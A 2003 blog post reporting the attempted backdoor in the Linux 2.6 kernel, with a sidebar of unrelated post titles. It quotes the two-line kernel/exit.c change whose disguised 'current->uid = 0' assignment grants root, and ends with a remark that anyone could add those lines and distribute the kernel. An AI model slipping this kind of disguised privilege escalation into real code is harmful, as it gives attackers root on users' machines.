- Open Source Workshop #2 - Voyage Linux Introduction
- Spam protected email address for mailman archive
- Subversion to DVCS - Your mindset has to change as well
- DNMA92, ath9k and hostapd with Voyage Linux
- Slides for Open Source Developer talk at SFD
- Open Source Developer talk at Software Freedom Day 2009 HK
- Building compat-wireless drivers for 2.6.30
- leds-alix2 module in 2.6.30 kernel
- squashfs 4.0 on Debian Lenny and 2.6.30 kernel
- Upgrade Debian Etch Xen 3.0.2 to Lenny Xen 3.2
Linux Kernel Back Door Attempt
Submitted by punkytse on November 7, 2003 - 10:20.
Linux
Kernel Trap has a very interesting article describing an attempt to inject a back door to 2.6 kernel for gaining a root access:
Here are two lines are in kernel/exit.c:
+ if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) + retval = -EINVAL;
It was found that someone had directly modified the BitKeeper source tree. These changes has been detected by BitMover founder Larry McVoy and is now removed. Andreas Dilger pointed out that had the change gone undetected "it might have taken a good while to find".
If someone want to inject back door to kernel, just add these two lines in sys_wait4() call and distribute the kernel image.
» punkytse's blog | login to post comments


